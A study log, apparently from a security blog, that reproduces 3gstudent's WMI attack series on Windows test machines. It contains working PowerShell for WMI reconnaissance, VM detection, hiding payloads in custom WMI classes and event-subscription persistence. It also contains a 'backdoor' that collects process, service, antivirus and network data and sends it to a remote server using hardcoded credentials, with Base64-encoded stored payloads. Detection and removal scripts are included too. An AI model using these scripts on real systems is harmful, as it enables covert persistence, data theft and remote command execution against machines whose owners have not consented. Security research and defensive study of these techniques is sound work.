Windows WMI analysis and application (part 1)
Keywords: Windows, persistence, vulnerability  Status: in progress
References:
WMI Attacks
https://wooyun.x10sec.org/static/drops/tips-8189.html [original article by 三好学生, first published on WooYun Drops]
WMI Backdoor
https://wooyun.x10sec.org/static/drops/tips-8260.html [original article by 三好学生, first published on WooYun Drops]
WMI Defense
https://wooyun.js.org/drops/WMI Defense.html [original article by 三好学生; original URL: http://drops.wooyun.org/tips/8290]
WMI-related notes
https://3gstudent.github.io/Study-Notes-of-WMI-Persistence-using-wmic.exe
WSC, JSRAT and WMI Backdoor
https://wooyun.x10sec.org/static/drops/tips-15575.html
0x00 Preface
Reading a thing a thousand times is worth less than trying it once. This post is a study and hands-on test log of the WMI article series by 三好学生 (3gstudent), kept purely as a learning record. The original links are listed above.
0x01 WMI attacks with PowerShell
Environment
- Current environment: Windows 10; PowerShell v3 or later is required
Related commands: information gathering
Operating system information
PS C:\Users\admin> Get-WmiObject -Namespace ROOT\CIMV2 -Class Win32_OperatingSystem
SystemDirectory : C:\Windows\system32
Organization :
RegisteredUser : Windows 用户
PS C:\Users\admin> Get-WmiObject -Namespace ROOT\CIMV2 -Class Win32_ComputerSystem
Domain : WORKGROUP
Manufacturer : VMware, Inc.
Name : DESKTOP-78M3Q0H
PrimaryOwnerName : Windows 用户
TotalPhysicalMemory : 8588869632
PS C:\Users\admin> Get-WmiObject -Namespace ROOT\CIMV2 -Class Win32_BIOS
Version : INTEL - 6040000
File/directory listing
Get-WmiObject -Namespace ROOT\CIMV2 -Class CIM_DataFile
Disk volume listing
Get-WmiObject -Namespace ROOT\CIMV2 -Class Win32_Volume
PS C:\Users\admin> Get-WmiObject -Namespace ROOT\CIMV2 -Class Win32_Volume|findstr "Caption"
Caption : C:\
Caption : E:\
Caption : \\?\Volume{6e506627-7001-4ecc-a1fb-bf533c7cae23}\
Caption : G:\
Registry operations (untested)
Get-WmiObject -Namespace ROOT\DEFAULT -Class StdRegProv
Push-Location HKLM:SOFTWARE\Microsoft\Windows\CurrentVersion\Run
Get-ItemProperty OptionalComponents
Current processes
Get-WmiObject -Namespace ROOT\CIMV2 -Class Win32_Process
Enumerate services
Get-WmiObject -Namespace ROOT\CIMV2 -Class Win32_Service
Event logs
Get-WmiObject -Namespace ROOT\CIMV2 -Class Win32_NtLogEvent
Logged-on accounts
PS HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\Run> Get-WmiObject -Namespace ROOT\CIMV2 -Class Win32_LoggedOnUser
__GENUS : 2
__CLASS : Win32_LoggedOnUser
__SUPERCLASS : CIM_Dependency
__DYNASTY : CIM_Dependency
__RELPATH : Win32_LoggedOnUser.Antecedent="\\\\.\\root\\cimv2:Win32_Account.Domain=\"DESKTOP-78M3Q0H\",Name=\"admin\"",Dependent="\\\\.\\root\\cimv2:Win32_LogonSession.LogonId=\"183715\""
__PROPERTY_COUNT : 2
__DERIVATION : {CIM_Dependency}
__SERVER : DESKTOP-78M3Q0H
__NAMESPACE : ROOT\CIMV2
__PATH : \\DESKTOP-78M3Q0H\ROOT\CIMV2:Win32_LoggedOnUser.Antecedent="\\\\.\\root\\cimv2:Win32_Account.Domain=\"DESKTOP-78M3Q0H\",Name=\"admin\"",Dependent="\\\\.\\root\\cimv2:Win32_LogonSession.LogonId=\"183715\""
Antecedent : \\.\root\cimv2:Win32_Account.Domain="DESKTOP-78M3Q0H",Name="admin"
Dependent : \\.\root\cimv2:Win32_LogonSession.LogonId="183715"
PSComputerName : DESKTOP-78M3Q0H
__GENUS : 2
__CLASS : Win32_LoggedOnUser
__SUPERCLASS : CIM_Dependency
__DYNASTY : CIM_Dependency
__RELPATH : Win32_LoggedOnUser.Antecedent="\\\\.\\root\\cimv2:Win32_Account.Domain=\"DESKTOP-78M3Q0H\",Name=\"admin\"",Dependent="\\\\.\\root\\cimv2:Win32_LogonSession.LogonId=\"183625\""
__PROPERTY_COUNT : 2
__DERIVATION : {CIM_Dependency}
__SERVER : DESKTOP-78M3Q0H
__NAMESPACE : ROOT\CIMV2
__PATH : \\DESKTOP-78M3Q0H\ROOT\CIMV2:Win32_LoggedOnUser.Antecedent="\\\\.\\root\\cimv2:Win32_Account.Domain=\"DESKTOP-78M3Q0H\",Name=\"admin\"",Dependent="\\\\.\\root\\cimv2:Win32_LogonSession.LogonId=\"183625\""
Antecedent : \\.\root\cimv2:Win32_Account.Domain="DESKTOP-78M3Q0H",Name="admin"
Dependent : \\.\root\cimv2:Win32_LogonSession.LogonId="183625"
PSComputerName : DESKTOP-78M3Q0H
Shares
Name Path Description
---- ---- -----------
ADMIN$ C:\Windows 远程管理
C$ C:\ 默认共享
E$ E:\ 默认共享
IPC$ 远程 IPC
Patches
PS HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\Run> Get-WmiObject -Namespace ROOT\CIMV2 -Class Win32_QuickFixEngineering
Source Description HotFixID InstalledBy InstalledOn
------ ----------- -------- ----------- -----------
DESKTOP-78... Security Update KB4570334 2020/9/27 0:00:00
DESKTOP-78... Security Update KB4577266 2020/9/27 0:00:00
Antivirus software
PS HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\Run> Get-WmiObject -Namespace root\SecurityCenter2 -Class AntiVirusProduct
__GENUS : 2
__CLASS : AntiVirusProduct
__SUPERCLASS :
__DYNASTY : AntiVirusProduct
__RELPATH : AntiVirusProduct.instanceGuid="{D68DDC3A-831F-4fae-9E44-DA132C1ACF46}"
__PROPERTY_COUNT : 6
__DERIVATION : {}
__SERVER : DESKTOP-78M3Q0H
__NAMESPACE : ROOT\SecurityCenter2
__PATH : \\DESKTOP-78M3Q0H\ROOT\SecurityCenter2:AntiVirusProduct.instanceGuid="{D68DDC3A-831F-4fae-9E44-DA132C1ACF46}"
displayName : Windows Defender
instanceGuid : {D68DDC3A-831F-4fae-9E44-DA132C1ACF46}
pathToSignedProductExe : windowsdefender://
pathToSignedReportingExe : %ProgramFiles%\Windows Defender\MsMpeng.exe
productState : 397568
timestamp : Fri, 25 Jun 2020 01:35:57 GMT
PSComputerName : DESKTOP-78M3Q0H
Application: virtual machine detection
Check the logical processor count and physical memory (seems unreliable!)
$VMDetected = $False
$Arguments = @{Class = 'Win32_ComputerSystem';Filter = 'NumberOfLogicalProcessors < 2 AND TotalPhysicalMemory < 2147483648'}
if (Get-WmiObject @Arguments) { $VMDetected = $True;"In vm"} else{"Not in vm"}
Check for a VMware network adapter, BIOS serial number or vmtoolsd.exe process
$VMwareDetected = $False
$VMAdapter = Get-WmiObject Win32_NetworkAdapter -Filter 'Manufacturer LIKE "%VMware%" OR Name LIKE "%VMware%"'
$VMBios = Get-WmiObject Win32_BIOS -Filter 'SerialNumber LIKE "%VMware%"'
$VMToolsRunning = Get-WmiObject Win32_Process -Filter 'Name="vmtoolsd.exe"'
if ($VMAdapter -or $VMBios -or $VMToolsRunning) { $VMwareDetected = $True ;"in vm"} else{"not in vm"}
Application: storing a payload in a WMI class [administrator privileges]
Store
$StaticClass = New-Object Management.ManagementClass('root\cimv2', $null,$null)
$StaticClass.Name = 'Win32_EvilClass'
$StaticClass.Put()
$StaticClass.Properties.Add('EvilProperty' , "This is payload")
$StaticClass.Put()
Path : \\DESKTOP-78M3Q0H\ROOT\cimv2:Win32_EvilClass
RelativePath : Win32_EvilClass
Server : DESKTOP-78M3Q0H
NamespacePath : ROOT\cimv2
ClassName : Win32_EvilClass
IsClass : True
IsInstance : False
IsSingleton : False
Read
PS C:\Windows\system32> ([WmiClass] 'Win32_EvilClass').Properties['EvilProperty']
Name : EvilProperty
Value : This is payload
Type : String
IsLocal : True
IsArray : False
Origin : Win32_EvilClass
Qualifiers : {CIMTYPE}
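The class created above carries its data as a property default value on a static class that no provider backs (the Win32_UserInfo and Win32_CommandTest classes in the Backdoor section below are stored the same way). The following PowerShell is an added example, not code from this post or from 三好学生's articles, that hunts for such classes across one or all namespaces; the function names, the -Recurse option and the qualifier heuristic are my own assumptions.

```powershell
# Added example (not from the original post): hunt for static WMI classes that carry
# string data as property defaults, the storage technique shown above.
# Assumptions: function names are my own; heuristic = the class is not a system (__*) class,
# has no 'dynamic'/'provider'/'abstract' qualifier, and at least one string property has a default value.

function Get-WmiNamespaceTree {
    # Recursively list namespaces starting at $Root (the __NAMESPACE class holds the children)
    param([string]$Root = 'root')
    $Root
    Get-WmiObject -Namespace $Root -Class __NAMESPACE -ErrorAction SilentlyContinue |
        ForEach-Object { Get-WmiNamespaceTree -Root "$Root\$($_.Name)" }
}

function Find-WmiStaticDataClass {
    [CmdletBinding()]
    param(
        [string]$Namespace = 'root\cimv2',
        [switch]$Recurse,          # walk every namespace below $Namespace
        [int]$MinLength = 1        # raise to e.g. 256 to see only large blobs
    )
    $namespaces = if ($Recurse) { Get-WmiNamespaceTree -Root $Namespace } else { @($Namespace) }

    foreach ($ns in $namespaces) {
        $classes = Get-WmiObject -Namespace $ns -List -ErrorAction SilentlyContinue
        foreach ($cls in $classes) {
            if ($cls.Name -like '__*') { continue }
            # Provider-backed and abstract classes do not hold stored data of this kind
            $q = @($cls.Qualifiers | ForEach-Object { $_.Name.ToLower() })
            if ($q -contains 'dynamic' -or $q -contains 'provider' -or $q -contains 'abstract') { continue }

            foreach ($p in $cls.Properties) {
                if ($p.Type -ne 'String' -or -not $p.Value) { continue }
                $text = [string]$p.Value
                if ($text.Length -lt $MinLength) { continue }
                [pscustomobject]@{
                    Namespace   = $ns
                    Class       = $cls.Name
                    Property    = $p.Name
                    Length      = $text.Length
                    LooksBase64 = ($text -match '^[A-Za-z0-9+/=\s]{16,}$')
                    Preview     = $text.Substring(0, [Math]::Min(80, $text.Length))
                }
            }
        }
    }
}

# Usage:
#   Find-WmiStaticDataClass | Format-Table -AutoSize
#   Find-WmiStaticDataClass -Namespace root -Recurse -MinLength 256 | Format-List
```

With the default settings the Win32_EvilClass above shows up as a 15-character string on a class with no qualifiers; the LooksBase64 column is what makes the encoded commands stored in Win32_Command (later on this page) stand out from legitimate short defaults.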
Application: covertly starting a program on a timer [administrator privileges]
One-liner
$filterName = 'BotFilter82';$consumerName = 'BotConsumer23';$exePath = 'C:\Windows\System32\notepad.exe';$Query = "SELECT * FROM __InstanceModificationEvent WITHIN 60 WHERE TargetInstance ISA 'Win32_PerfFormattedData_PerfOS_System'";$WMIEventFilter = Set-WmiInstance -Class __EventFilter -NameSpace "root\subscription" -Arguments @{Name=$filterName;EventNameSpace="root\cimv2";QueryLanguage="WQL";Query=$Query} -ErrorAction Stop;$WMIEventConsumer = Set-WmiInstance -Class CommandLineEventConsumer -Namespace "root\subscription" -Arguments @{Name=$consumerName;ExecutablePath=$exePath;CommandLineTemplate=$exePath};Set-WmiInstance -Class __FilterToConsumerBinding -Namespace "root\subscription" -Arguments @{Filter=$WMIEventFilter;Consumer=$WMIEventConsumer}
Multi-line
$filterName = 'BotFilter82'
$consumerName = 'BotConsumer23'
$exePath = 'C:\Windows\System32\notepad.exe'
$Query = "SELECT * FROM __InstanceModificationEvent WITHIN 60 WHERE TargetInstance ISA 'Win32_PerfFormattedData_PerfOS_System'"
$WMIEventFilter = Set-WmiInstance -Class __EventFilter -NameSpace "root\subscription" -Arguments @{Name=$filterName;EventNameSpace="root\cimv2";QueryLanguage="WQL";Query=$Query} -ErrorAction Stop
$WMIEventConsumer = Set-WmiInstance -Class CommandLineEventConsumer -Namespace "root\subscription" -Arguments @{Name=$consumerName;ExecutablePath=$exePath;CommandLineTemplate=$exePath}
Set-WmiInstance -Class __FilterToConsumerBinding -Namespace "root\subscription" -Arguments @{Filter=$WMIEventFilter;Consumer=$WMIEventConsumer}
Result
__GENUS : 2
__CLASS : __FilterToConsumerBinding
__SUPERCLASS : __IndicationRelated
__DYNASTY : __SystemClass
__RELPATH : __FilterToConsumerBinding.Consumer="CommandLineEventConsumer.Name=\"BotConsumer23\"",Filter="__EventFilter.Name=\"BotFilter82\""
__PROPERTY_COUNT : 7
__DERIVATION : {__IndicationRelated, __SystemClass}
__SERVER : DESKTOP-78M3Q0H
__NAMESPACE : ROOT\subscription
__PATH : \\DESKTOP-78M3Q0H\ROOT\subscription:__FilterToConsumerBinding.Consumer="CommandLineEventConsumer.Name=\"BotConsumer23\"",Filter="__EventFilter.Name=\"BotFilter82\""
Consumer : CommandLineEventConsumer.Name="BotConsumer23"
CreatorSID : {1, 5, 0, 0...}
DeliverSynchronously : False
DeliveryQoS :
Filter : __EventFilter.Name="BotFilter82"
MaintainSecurityContext : False
SlowDownProviders : False
PSComputerName : DESKTOP-78M3Q
Application: WMI backdoor detection and removal [administrator privileges]
- List the current WMI event subscriptions
#List Event Filters
Get-WMIObject -Namespace root\Subscription -Class __EventFilter
#List Event Consumers
Get-WMIObject -Namespace root\Subscription -Class __EventConsumer
#List Event Bindings
Get-WMIObject -Namespace root\Subscription -Class __FilterToConsumerBinding
- Remove the backdoor
#Filter
Get-WMIObject -Namespace root\Subscription -Class __EventFilter -Filter "Name='BotFilter82'" | Remove-WmiObject -Verbose
#Consumer
Get-WMIObject -Namespace root\Subscription -Class CommandLineEventConsumer -Filter "Name='BotConsumer23'" | Remove-WmiObject -Verbose
#Binding
Get-WMIObject -Namespace root\Subscription -Class __FilterToConsumerBinding -Filter "__Path LIKE '%BotFilter82%'" | Remove-WmiObject -Verbose
- Other detection methods
– VBS
– MOF
– C/C++ via the IWbem* COM API
– .NET System.Management classes
- Check the event logs
– Microsoft-Windows-WinRM/Operational
– Microsoft-Windows-WMI-Activity/Operational
– Microsoft-Windows-DistributedCOM
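The three Get-WMIObject calls above list filters, consumers and bindings separately, which leaves the analyst to match them up by hand. The following PowerShell is an added example, not code from this post or from 三好学生's articles: it joins every binding to its filter and consumer, extracts the action from each consumer class (the five classes listed at the end of this page), decodes a -enc/-EncodedCommand payload (UTF-16LE base64, as used in the Backdoor section) so the reviewer can read what would run, pulls event 5861 from the WMI-Activity log named above, and removes one subscription with -WhatIf support. The function names and the launcher keyword list are my own assumptions; run it as administrator.

```powershell
# Added example (not from the original post): audit, decode and remove permanent WMI event subscriptions.
# Assumptions: function names and the $suspect keyword list are my own; run with administrator rights.

function Get-WmiSubscriptionAudit {
    [CmdletBinding()]
    param([string]$ComputerName = '.')

    $wmi = @{ ComputerName = $ComputerName; Namespace = 'root\subscription' }
    $filters   = @(Get-WmiObject @wmi -Class __EventFilter)
    $consumers = @(Get-WmiObject @wmi -Class __EventConsumer)   # base class query returns every consumer subclass
    $bindings  = @(Get-WmiObject @wmi -Class __FilterToConsumerBinding)

    # Launchers that rarely belong in a consumer on a workstation
    $suspect = 'powershell|pwsh|cmd\.exe|wscript|cscript|mshta|rundll32|regsvr32|certutil|bitsadmin'

    foreach ($b in $bindings) {
        # With Get-WmiObject the Filter/Consumer members are reference strings such as
        # __EventFilter.Name="BotFilter82"; pull the key out with a regex
        $fName = [regex]::Match([string]$b.Filter,   'Name\s*=\s*"([^"]+)"').Groups[1].Value
        $cName = [regex]::Match([string]$b.Consumer, 'Name\s*=\s*"([^"]+)"').Groups[1].Value
        $f = $filters   | Where-Object { $_.Name -eq $fName } | Select-Object -First 1
        $c = $consumers | Where-Object { $_.Name -eq $cName } | Select-Object -First 1

        # The "action" lives in a different property for each consumer class
        $action = '<consumer not found>'
        if ($c) {
            $action = switch ($c.__CLASS) {
                'CommandLineEventConsumer'  { if ($c.CommandLineTemplate) { $c.CommandLineTemplate } else { $c.ExecutablePath } }
                'ActiveScriptEventConsumer' { if ($c.ScriptText) { "[inline $($c.ScriptingEngine)] $($c.ScriptText)" } else { $c.ScriptFileName } }
                'LogFileEventConsumer'      { "write to $($c.Filename)" }
                'NTEventLogEventConsumer'   { "event log source $($c.SourceName)" }
                'SMTPEventConsumer'         { "mail to $($c.ToLine)" }
                default                     { "<unhandled class $($c.__CLASS)>" }
            }
        }

        # Recover an encoded PowerShell command so the reviewer sees what would actually run
        $decoded = $null
        $m = [regex]::Match([string]$action, '(?i)(?:-encodedcommand|-enc|-ec|-e)\s+([A-Za-z0-9+/=]{8,})')
        if ($m.Success) {
            try   { $decoded = [Text.Encoding]::Unicode.GetString([Convert]::FromBase64String($m.Groups[1].Value)) }
            catch { $decoded = '<base64 decode failed>' }
        }

        [pscustomobject]@{
            Filter         = $fName
            Query          = $f.Query
            ConsumerClass  = $c.__CLASS
            Consumer       = $cName
            Action         = $action
            DecodedPayload = $decoded
            Suspicious     = [bool]($decoded -or ($action -match $suspect))
        }
    }
}

function Get-WmiSubscriptionLogEvents {
    # Event 5861 records a new permanent event consumer registration (Windows 10 / Server 2016 and later)
    Get-WinEvent -FilterHashtable @{ LogName = 'Microsoft-Windows-WMI-Activity/Operational'; Id = 5861 } -ErrorAction SilentlyContinue |
        Select-Object TimeCreated, Id, Message
}

function Remove-WmiSubscription {
    # Deletes the binding first, then the consumer and the filter; -WhatIf previews the removal
    [CmdletBinding(SupportsShouldProcess = $true)]
    param([Parameter(Mandatory = $true)][string]$FilterName,
          [Parameter(Mandatory = $true)][string]$ConsumerName)

    $ns = 'root\subscription'
    $targets = @(
        Get-WmiObject -Namespace $ns -Class __FilterToConsumerBinding |
            Where-Object { $_.Filter -like "*Name=`"$FilterName`"*" -and $_.Consumer -like "*Name=`"$ConsumerName`"*" }
        Get-WmiObject -Namespace $ns -Class __EventConsumer | Where-Object { $_.Name -eq $ConsumerName }
        Get-WmiObject -Namespace $ns -Class __EventFilter   | Where-Object { $_.Name -eq $FilterName }
    )
    foreach ($t in $targets) {
        if ($PSCmdlet.ShouldProcess($t.__RELPATH, 'Remove-WmiObject')) { $t | Remove-WmiObject }
    }
}

# Usage:
#   Get-WmiSubscriptionAudit | Where-Object Suspicious | Format-List
#   Get-WmiSubscriptionLogEvents | Select-Object -First 5
#   Remove-WmiSubscription -FilterName 'BotFilter82' -ConsumerName 'BotConsumer23' -WhatIf
```

Expect one non-suspicious row on a stock Windows install: the built-in "SCM Event Log Filter" bound to the NTEventLogEventConsumer "SCM Event Log Consumer". The BotFilter82/BotConsumer23 subscription from the section above is reported with ConsumerClass CommandLineEventConsumer and Action notepad.exe, and the Base64-encoded consumer built later in the Backdoor section is reported with its DecodedPayload filled in.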
0x02 Advanced WMI techniques: WMI Backdoor
- Test environment
server (listening server side)
172.16.1.201
win2012x64
username:administrator
password:1qaz!QAZ
client (controlled side)
172.16.1.211
win10x64
- Step 1: the client collects host configuration, connects to the remote server and stores it there (run on the client)
# Connect to 172.16.1.201
$Options = New-Object Management.ConnectionOptions
$Options.Username = 'makapaka.garden\administrator'
$Options.Password = '1qaz!QAZ'
$Options.EnablePrivileges = $True
$Connection = New-Object Management.ManagementScope
$Connection.Path = '\\172.16.1.201\root\cimv2'
$Connection.Options = $Options
$Connection.Connect()
$EvilClass = New-Object Management.ManagementClass($Connection, [String]::Empty, $null)
# Set the new class name
$EvilClass['__CLASS'] = 'Win32_UserInfo'
$EvilClass.Properties.Add('IP172161211', [Management.CimType]::String, $False)
# Collect host configuration
$GetOS=Get-WmiObject -Namespace ROOT\CIMV2 -Class Win32_OperatingSystem
$GetProcess=Get-WmiObject -Namespace ROOT\CIMV2 -Class Win32_Process
$GetService=Get-WmiObject -Namespace ROOT\CIMV2 -Class Win32_Service -Filter "State='Running'"
$GetUser=Get-WmiObject -Namespace ROOT\CIMV2 -Class Win32_ComputerSystem
$GetAV=Get-WmiObject -Namespace root\SecurityCenter2 -Class AntiVirusProduct
# Note: the newline character in PowerShell is `n
$EvilClass.Properties['IP172161211'].Value =$GetUser.UserName+"`n"+"OS:"+$GetOS.Caption+";"+$GetOS.OSArchitecture+"`n"+"AntiVirusProduct:"+ $GetAV.displayName+"`n"+"Process:"+"`n"+$GetProcess.Name+"`n"+"Service Start:"+"`n"+$GetService.Name
# Store
$EvilClass.Put()
- Step 1: result (run on the client)
Path : \\172.16.1.201\root\cimv2:Win32_UserInfo
RelativePath : Win32_UserInfo
Server : 172.16.1.201
NamespacePath : root\cimv2
ClassName : Win32_UserInfo
IsClass : True
IsInstance : False
IsSingleton : False
- Step 2: query (run on the server)
([WmiClass]'Win32_UserInfo').Properties['IP172161211']
PS C:\Users\admin> ([WmiClass]'Win32_UserInfo').Properties['IP172161211']
Name : IP172161211
Value : MAKAPAKA\Dev1
OS:Microsoft Windows 10 专业版;64 位
AntiVirusProduct:Windows Defender
Process:
System Idle Process System Registry smss.exe csrss.exe csrss.exe wininit.exe winlogon.exe services.exe lsass.exe svchost.exe fontdrvhost.exe fontdrvhost.exe svchost.exe dwm.exe svchost.exe svchost.exe svchost.exe svchost.exe svchost.exe svchost.exe svchost.exe svchost.exe svchost.exe svchost.exe Memory Compression svchost.exe svchost.exe svchost.exe svchost.exe spoolsv.exe svchost.exe vmtoolsd.exe vm3dservice.exe VGAuthService.exe MsMpEng.exe vm3dservice.exe svchost.exe dllhost.exe WmiPrvSE.exe msdtc.exe NisSrv.exe MoUsoCoreWorker.exe svchost.exe dasHost.exe svchost.exe sihost.exe svchost.exe taskhostw.exe ctfmon.exe explorer.exe ChsIME.exe svchost.exe SearchIndexer.exe StartMenuExperienceHost.exe RuntimeBroker.exe SearchApp.exe RuntimeBroker.exe TextInputHost.exe RuntimeBroker.exe dllhost.exe SecurityHealthSystray.exe SecurityHealthService.exe vmtoolsd.exe cmd.exe conhost.exe MusNotifyIcon.exe OneDrive.exe SgrmBroker.exe uhssvc.exe svchost.exe ApplicationFrameHost.exe svchost.exe powershell.exe powershell.exe conhost.exe svchost.exe Microsoft.Photos.exe RuntimeBroker.exe WmiPrvSE.exe svchost.exe RuntimeBroker.exe smartscreen.exe ChsIME.exe audiodg.exe
Service Start:
Appinfo AppXSvc AudioEndpointBuilder Audiosrv BFE BrokerInfrastructure BTAGService BthAvctpSvc bthserv CDPSvc COMSysApp CoreMessagingRegistrar CryptSvc DcomLaunch DeviceAssociationService Dhcp DiagTrack DispBrokerDesktopSvc Dnscache DoSvc DPS DsSvc DusmSvc EventLog EventSystem fdPHost FDResPub FontCache InstallService iphlpsvc KeyIso LanmanServer LanmanWorkstation LicenseManager lmhosts LSM mpssvc MSDTC NcbService Netlogon netprofm NlaSvc nsi PcaSvc PlugPlay Power ProfSvc RasMan RmSvc RpcEptMapper RpcSs SamSs Schedule SecurityHealthService SEMgrSvc SENS SgrmBroker ShellHWDetection SmsRouter Spooler SSDPSRV SstpSvc StateRepository StorSvc SysMain SystemEventsBroker TabletInputService Themes TimeBrokerSvc TokenBroker TrkWks uhssvc UserManager UsoSvc VaultSvc VGAuthService vm3dservice VMTools W32Time WaaSMedicSvc Wcmsvc WdiServiceHost WdiSystemHost WdNisSvc WinDefend WinHttpAutoProxySvc Winmgmt WpnService wscsvc WSearch wuauserv cbdhsvc_c66fa CDPUserSvc_c66fa OneSyncSvc_c66fa PimIndexMaintenanceSvc_c66fa UnistoreSvc_c66fa UserDataSvc_c66fa WpnUserService_c66fa
Type : String
IsLocal : True
IsArray : False
Origin : Win32_UserInfo
Qualifiers : {CIMTYPE}
- Step 3: the client fetches the instruction and executes it
The client stores the instruction Base64-encoded
The client reads the instruction, decodes it and executes it
Client code
- The client stores the instruction Base64-encoded (elevation required)
# Define the payload; a single-quoted here-string keeps the variables unexpanded so they are resolved when the payload runs
$Payload=@'
$Options = New-Object Management.ConnectionOptions
$Options.Username = 'makapaka.garden\administrator'
$Options.Password = '1qaz!QAZ'
$Options.EnablePrivileges = $True
$Connection = New-Object Management.ManagementScope
$Connection.Path = '\\172.16.1.201\root\cimv2'
$Connection.Options = $Options
$Connection.Connect()
$EvilClass = New-Object Management.ManagementClass($Connection, [String]::Empty, $null)
$EvilClass['__CLASS'] = 'Win32_CommandTest'
$EvilClass.Properties.Add('IP172161211', [Management.CimType]::String, $False)
$EvilClass.Properties['IP172161211'].Value ="Run Command Test!"
$EvilClass.Put()
'@
# Base64-encode the payload
$bytes = [System.Text.Encoding]::Unicode.GetBytes($Payload)
$EncodedPayload = [System.Convert]::ToBase64String($bytes)
# Store the encoded payload
$StaticClass = New-Object Management.ManagementClass('root\cimv2', $null,$null)
$StaticClass.Name = 'Win32_Command'
$StaticClass.Put()
$StaticClass.Properties.Add('EnCommand' , $EncodedPayload)
$StaticClass.Put()
Tip:
Base64 conversion
$a = ipconfig /all
$b = [Convert]::ToBase64String([Text.Encoding]::UTF8.GetBytes($a))
[Text.Encoding]::UTF8.GetString([Convert]::FromBase64String($b))
- The client stores the instruction Base64-encoded, with command execution (elevation required)
# Define the payload; a single-quoted here-string keeps the variables unexpanded so they are resolved when the payload runs
$Payload=@'
$Options = New-Object Management.ConnectionOptions
$Options.Username = 'makapaka.garden\administrator'
$Options.Password = '1qaz!QAZ'
$Options.EnablePrivileges = $True
$Connection = New-Object Management.ManagementScope
$Connection.Path = '\\172.16.1.201\root\cimv2'
$Connection.Options = $Options
$Connection.Connect()
$EvilClass = New-Object Management.ManagementClass($Connection, [String]::Empty, $null)
$EvilClass['__CLASS'] = 'Win32_CommandTest'
$EvilClass.Properties.Add('IP172161211', [Management.CimType]::String, $False)
$command = ipconfig /all
$EvilClass.Properties['IP172161211'].Value =[Convert]::ToBase64String([Text.Encoding]::UTF8.GetBytes($command))
$EvilClass.Put()
'@
# Base64-encode the payload
$bytes = [System.Text.Encoding]::Unicode.GetBytes($Payload)
$EncodedPayload = [System.Convert]::ToBase64String($bytes)
# Store the encoded payload
$StaticClass = New-Object Management.ManagementClass('root\cimv2', $null,$null)
$StaticClass.Name = 'Win32_Command'
$StaticClass.Put()
$StaticClass.Properties.Add('EnCommand' , $EncodedPayload)
$StaticClass.Put()
Base64-encoding the command output
$command = ipconfig /all
$EvilClass.Properties['IP172161211'].Value =[Convert]::ToBase64String([Text.Encoding]::UTF8.GetBytes($command))
Base64 decoding on the server
$result=([WmiClass] 'Win32_CommandTest').Properties['IP172161211'].Value
[Text.Encoding]::UTF8.GetString([Convert]::FromBase64String($result))
Result
PS C:\Users\admin> [Text.Encoding]::Utf8.GetString([Convert]::FromBase64String($result))
Windows IP 配置
主机名 . . . . . . . . . . . . . : DevC1
主 DNS 后缀 . . . . . . . . . . . : makapaka.garden
节点类型 . . . . . . . . . . . . : 混合
IP 路由已启用 . . . . . . . . . . : 否
WINS 代理已启用 . . . . . . . . . : 否
DNS 后缀搜索列表 . . . . . . . . : makapaka.garden
localdomain
以太网适配器 Ethernet0:
连接特定的 DNS 后缀 . . . . . . . : localdomain
描述. . . . . . . . . . . . . . . : Intel(R) 82574L Gigabit Network Connection
物理地址. . . . . . . . . . . . . : 00-0C-29-6B-36-09
DHCP 已启用 . . . . . . . . . . . : 是
自动配置已启用. . . . . . . . . . : 是
本地链接 IPv6 地址. . . . . . . . : fe80::95a8:a9a1:1c42:66bb%9(首选)
IPv4 地址 . . . . . . . . . . . . : 192.168.235.135(首选)
子网掩码 . . . . . . . . . . . . : 255.255.255.0
获得租约的时间 . . . . . . . . . : 2020年6月28日 9:28:06
租约过期的时间 . . . . . . . . . : 2020年6月28日 11:43:06
默认网关. . . . . . . . . . . . . : 192.168.235.2
DHCP 服务器 . . . . . . . . . . . : 192.168.235.254
DHCPv6 IAID . . . . . . . . . . . : 100666409
DHCPv6 客户端 DUID . . . . . . . : 00-01-00-01-28-4E-4E-9C-00-0C-29-6B-36-09
DNS 服务器 . . . . . . . . . . . : 192.168.235.2
主 WINS 服务器 . . . . . . . . . : 192.168.235.2
TCPIP 上的 NetBIOS . . . . . . . : 已启用
以太网适配器 Ethernet1:
连接特定的 DNS 后缀 . . . . . . . :
描述. . . . . . . . . . . . . . . : Intel(R) 82574L Gigabit Network Connection #2
物理地址. . . . . . . . . . . . . : 00-0C-29-6B-36-13
DHCP 已启用 . . . . . . . . . . . : 否
自动配置已启用. . . . . . . . . . : 是
本地链接 IPv6 地址. . . . . . . . : fe80::3419:de22:d5d:d52d%13(首选)
IPv4 地址 . . . . . . . . . . . . : 172.16.1.211(首选)
子网掩码 . . . . . . . . . . . . : 255.255.255.0
默认网关. . . . . . . . . . . . . : 172.16.1.201
DHCPv6 IAID . . . . . . . . . . . : 419433513
DHCPv6 客户端 DUID . . . . . . . : 00-01-00-01-28-4E-4E-9C-00-0C-29-6B-36-09
DNS 服务器 . . . . . . . . . . . : 172.16.1.201
TCPIP 上的 NetBIOS . . . . . . . : 已启用
以太网适配器 蓝牙网络连接:
媒体状态 . . . . . . . . . . . . : 媒体已断开连接
连接特定的 DNS 后缀 . . . . . . . :
描述. . . . . . . . . . . . . . . : Bluetooth Device (Personal Area Network)
物理地址. . . . . . . . . . . . . : A8-7E-EA-E9-D7-06
DHCP 已启用 . . . . . . . . . . . : 是
自动配置已启用. . . . . . . . . . :
Result
PS C:\Windows\system32> $StaticClass.Put()
Path : \\DEVC1\ROOT\cimv2:Win32_Command
RelativePath : Win32_Command
Server : DEVC1
NamespacePath : ROOT\cimv2
ClassName : Win32_Command
IsClass : True
IsInstance : False
IsSingleton : False
- The client views the encoded payload
([WmiClass] 'Win32_Command').Properties['EnCommand'].Value
Result
PS C:\Windows\system32> ([WmiClass] 'Win32_Command').Properties['EnCommand']
Name : EnCommand
Value : JABPAHAAdABpAG8AbgBzACAAPQAgAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABNAGEAbgBhAGcAZQBtAGUAbgB0AC4AQwBvAG4AbgBlAGMAdA
BpAG8AbgBPAHAAdABpAG8AbgBzAAoAJABPAHAAdABpAG8AbgBzAC4AVQBzAGUAcgBuAGEAbQBlACAAPQAgACcAbQBhAGsAYQBwAGEAawBh
AC4AZwBhAHIAZABlAG4AXABhAGQAbQBpAG4AaQBzAHQAcgBhAHQAbwByACcACgAkAE8AcAB0AGkAbwBuAHMALgBQAGEAcwBzAHcAbwByAG
